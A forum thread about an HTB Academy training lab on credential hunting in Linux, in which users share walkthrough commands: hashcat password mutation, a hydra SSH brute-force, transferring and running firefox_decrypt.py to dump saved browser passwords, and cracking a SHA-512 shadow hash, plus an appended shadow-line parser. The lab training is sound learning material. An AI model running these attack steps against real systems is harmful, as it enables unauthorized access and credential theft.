PASSWORD ATTACK | ACADEMY - Credential Hunting in Linux

That’s a very common approach on all these exercises. GitHub usually is not resolvable.

Need help with this. I am very frustrated with firefox_decrypt.py not being part of htb especially when the vpn prevents you from downloading it for security reasons. Can somebody please help me because I have been struggling on this?

ooh man :laughing: :rofl:

Step 1 Mutated Password "Loveyou1"
echo "Loveyou1" | hashcat --force -r Downloads/custom.rule --stdout | sort -u > mutated-passwords

Step 2 Bruteforced Login
hydra -L user.list -P mut_password4.list ssh://10.129.92.118

Step 3 SSH With new password
ssh kira@10.129.92.118

Step 4 Set up HTTP server and transfer firefox_decrypt.py
python3 -m http.server 8000
wget http://10.10.14.246:8000 -r -np -nH --cut-dirs=1

Step 5 Run it and you will get will's password
python3.9 firefox_decrypt.py

1 Like

kira@nix01:~/Desktop/10.10.14.188/firefox_decrypt$ python3 firefox_decrypt.py
Traceback (most recent call last):
  File "firefox_decrypt.py", line 46, in <module>
    PWStore = list[dict[str, str]]
TypeError: 'type' object is not subscriptable

Someone please tell me what I’m missing. Been on this for days
:weary::weary:

1 Like

I had this issue too and it's a nightmare. Essentially the author has now updated the software to only work with a version of python that is not installed on the box anymore, and being that you are not SUDO, you cannot update python on the target. The fix lies in the OLD releases/tags on the firefox_decrypt GitHub page…frustrating but also satisfying in the end

1 Like

This helped a lot. Thank you!!!
But I’d love to know…How did you know to use an older version of the tool??

Happy to help! The GitHub states that the tool now needs at least python X and I did a python --version check on the box and it’s not new enough. So after poking around I found the old versions (pre v1) and tried them instead! Cheers and good luck

1 Like

I don’t know if this is the intended route, but somewhere in the beginning of the module it was stated that password reuse is common, so in each section I saved valid usernames and passwords that I came across.

Spraying with these lists I could log in with user s** from a previous section and then on the system I can see the other users, will and kira. So now I need to find kira’s password to be at the point of the hint I guess.

1 Like

Thank you so much, u helped me a lot :slight_smile:

Using Hydra to brute-force a password over SSH can be quite time-consuming and error-prone. There’s another service you can target that will get a hit much quicker, and the same password will work on SSH once you’ve cracked it. When you get into the victim machine, you may find it easier to scp the .mozilla folder onto your attack machine and run the Python script there, rather than trying to get the script and Python set up on the victim machine, but be sure to tell the script which directory to target, else it will default to cracking your own Firefox passwords.

If anyone is having trouble with the final salted hash after retrieving it from the hidden shadow.bak in the will directory, using the custom.rule with the -r option and the provided password.list from the resources will provide the proper password mutation to get your collision.

This includes:

  • $6$: Indicates SHA-512 is the hashing algorithm.
  • XePuRx/4eO0WuuPS: The salt.
  • “XXXXXXXX”: The password hash.

So we get "sudo hashcat -m 1800 -a 0 (path to hash.txt) (path to password.list) -r (path to custom.rule)" —Happy cracking—
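
The field layout described in the post above (scheme id, salt, hash), as an added example that is not part of the original thread: a small parser for shadow-style lines that is useful when reviewing a stray backup such as shadow.bak. The sample lines are constructed, the hash bodies are placeholders, and the user names and the `parse_shadow_line` helper are hypothetical; only the `$6$` prefix, the salt and mode 1800 come from the post.

```python
from typing import NamedTuple, Optional

# crypt(3) scheme id -> (name, hashcat mode). "$6$" / 1800 are the values
# quoted in the post; the other two are the sibling md5/sha256 schemes.
SCHEMES = {
    "1": ("md5crypt", 500),
    "5": ("sha256crypt", 7400),
    "6": ("sha512crypt", 1800),
}

class ShadowHash(NamedTuple):
    user: str
    scheme: str
    hashcat_mode: int
    rounds: Optional[int]   # None means the scheme's default cost
    salt: str
    digest: str

def parse_shadow_line(line: str) -> Optional[ShadowHash]:
    """Parse one shadow(5) line; None for locked, empty or unsupported entries."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2 or not fields[1].startswith("$"):
        return None                      # "*", "!", "!!" or "" carry no hash
    parts = fields[1].split("$")         # ['', id, [rounds=N,] salt, digest]
    if len(parts) < 4 or parts[1] not in SCHEMES:
        return None                      # e.g. yescrypt/bcrypt use other layouts
    rest, rounds = parts[2:], None
    if rest[0].startswith("rounds="):    # optional cost parameter
        value = rest[0][len("rounds="):]
        if not value.isdigit():
            return None
        rounds, rest = int(value), rest[1:]
    if len(rest) != 2:
        return None
    name, mode = SCHEMES[parts[1]]
    return ShadowHash(fields[0], name, mode, rounds, rest[0], rest[1])

# Constructed sample input: salt taken from the post, digests are placeholders.
SAMPLE = [
    "user1:$6$XePuRx/4eO0WuuPS$" + "X" * 86 + ":18000:0:99999:7:::",
    "user2:$6$rounds=10000$abcdefgh$" + "Y" * 86 + ":18000:0:99999:7:::",
    "daemon:*:18000:0:99999:7:::",
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(parse_shadow_line(entry))
```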